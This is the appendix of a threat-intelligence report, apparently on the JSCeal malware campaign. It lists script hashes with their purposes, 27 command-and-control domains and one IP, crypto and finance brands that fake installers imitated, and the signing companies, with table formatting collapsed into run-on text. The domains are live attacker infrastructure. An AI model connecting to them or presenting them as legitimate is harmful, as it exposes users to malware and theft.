Scriptssha256Purpose427624B7105243740BDF0B342846723623CAC5CE45959F7270EE465146E3147Fbackdoor loop56B633D2839F740D09A202A218172ADFDFF133142489088197621FD1AFC5A16Dget OS infoE95794F822C8C1694B28045BFE6A48713CA4D900F1ECC9B5E6E69E5BFA335AAAself deleteB4771F2932BB3DB63913B24BF646434C199085423862D4281D206B6DDD72BC77random sleepPowerShell Scripts’ C&Cs (27)csgo-play-de.com91.107.201.188printscreen.lolgrpc-test.me18-22-59.comtwisted.momschilllr.iculocal-mailer.comexternal-sex.com87-899.helppaid-rewards.lolourtyyq.beautydockmilk.comdev.prestashop.ms1-wishdesk.compffffer.icufoo-foo.bar:crayonput.comtonguerecord.commarkcracker.comlaborerbasket.combikeschair.comsawtruck.comtiming-kings.comtaylor-convert.comexperimental-tech.comfirewall-813.comlovely-race.comAppendix A – Impersonated BrandsBrand nameWhat is it?Where was it seen (as subdomain name or inside installer)Did we see ads and/or reached landing (fake) sites?Official URL + comment1WOWBITCrypto Exchangesubdomain + installerads + fake sitehttps://wowbit.com/2BinanceCrypto Exchangesubdomain + installerads + fake sitehttps://www.binance.com/en3BybitCrypto Exchangesubdomain + installerads + fake sitehttps://www.bybit.com/en/4OKXCrypto Exchangesubdomain + installerads + fake sitehttps://www.okx.com/5KuCoinCrypto Exchangesubdomainads(removed)https://www.kucoin.com/6CryptoCrypto Exchangesubdomainads(removed)https://crypto.com/7UPbitCrypto Exchangesubdomain + installerads(removed)https://upbit.com/8BitgetCrypto Exchangesubdomain + installerads + fake sitehttps://www.bitget.com/9RemitanoCrypto Exchangesubdomain + installerads + fake sitehttps://remitano.com/10SolflareCrypto Walletsubdomain + installerads + fake sitehttps://www.solflare.com/11LedgerCrypto Walletsubdomain + installerhttps://www.ledger.com/12Pi NetworkCryptocurrencysubdomain + installerads + fake sitehttps://minepi.com/13MoneroCryptocurrencysubdomainhttps://www.getmonero.org/14TradingViewTrading platformsubdomain + installerads + fake sitehttps://www.tradingview.com/15DAO MakerBlockchain platformsubdomainads(removed)https://app.daomaker.com/16RevolutFinancial appsubdomain + installerads + fake sitehttps://www.revolut.com/17KasikornbankThai bankinstallerhttps://www.kasikornbank.com/18bee.comCryptocurrencyinstallerhttps://www.bee.com/19kfcCryptocurrencysubdomain + installerLikely a token of Kentucky Fried Chicken – https://kfc.global20stake.comOnline casinoinstallerhttps://stake.com/213commas.ioTrading platforminstallerhttps://3commas.io/22lbank.comCrypto Exchangesubdomain + installerads + fake sitehttps://www.lbank.com/23Gate.ioCrypto Exchangesubdomain + installerads + fake sitehttps://www.gate.io/24PhantomCrypto Walletsubdomainadshttps://phantom.com/25trmpCryptocurrencysubdomainads(removed)likely TrumpCoin – https://gettrumpmemes.com/26pdax.phCrypto Exchangeinstallerhttps://pdax.ph/27MetaMaskCrypto Walletsubdomainads(removed)https://metamask.io/28BitcoinVNCrypto Exchangesubdomainhttps://bitcoinvn.io/29BitkubCrypto Exchangesubdomainads(removed)https://www.bitkub.com/30BitazzaCrypto Exchangesubdomainhttps://www.bitazza.com/31MetaTraderTrading platformsubdomain + installerads + fake sitehttps://www.metatrader5.com/en32CoinHubCrypto Exchangesubdomainads(removed)https://www.coinhub.mn/33eToroTrading platformsubdomainhttps://www.etoro.com/34TrustWalletCrypto Walletsubdomainads(removed)https://trustwallet.com/?utm_source=cryptwerk35BithumbCrypto Exchangesubdomainhttps://bithumbcorp.com/en/36GMGNTrading platformsubdomainhttps://gmgn.ai/37DEX ScreenerCrypto analytics platformsubdomain + installerads + fake sitehttps://dexscreener.com/38TopsharePortfolio managersubdomainhttps://www.topshare.com.au/39Mercado BitcoinCrypto Exchangesubdomainhttps://www.mercadobitcoin.com.br/40TONBlockchain platformsubdomain + installerads + fake sitehttps://ton.org/41Token MetricsCrypto platformsubdomain + installerads + fake sitehttps://www.tokenmetrics.com/42HTXCrypto exchangesubdomain + installerads + fake sitehttps://www.htx.com/43KrakenCrypto exchangesubdomainhttps://www.kraken.com/44Akka FinanceDecentralized finance (DeFi) platform| subdomain | | https://app.akka.finance | | 45 | VinDAX | Crypto exchange | subdomain | | https://vindax.com/ | | 46 | Dogecoin | Cryptocurrency | installer | | https://dogecoin.com/ | | 47 | Twex Exchange | Crypto exchange | installer | | https://www.twex.exchange/ | | 48 | Lutia NWL | Trading platform | installer | | installer opens https://lutia-nwl.link, official site https://lutianwl.com |Appendix B – Authenticode signaturesCompany nameTranslation to EnglishLLC MIR RTI“Мир Резиновых Технических Изделий” = “World of Rubber Technical Products”LLC Torgovyi Dom Energia“Торговый Дом Энергия” = “Energy Trading House”LLC Stroytorg“Строй Торг” = Trade of construction-related goods or servicesLLC Gazovaya Kompaniya“Газовая Компания” = “Gas Company”LLC Promtrade“Пром Торг” = ”промышленность торговля”=”industrial trade”LLC Kraft Market“Крафт Маркет” = Power market (from German)LLC Fashion OneLLC Plan BThe post Sealed Chain of Deception: Actors leveraging Node.JS to Launch JSCeal appeared first on Check Point Research.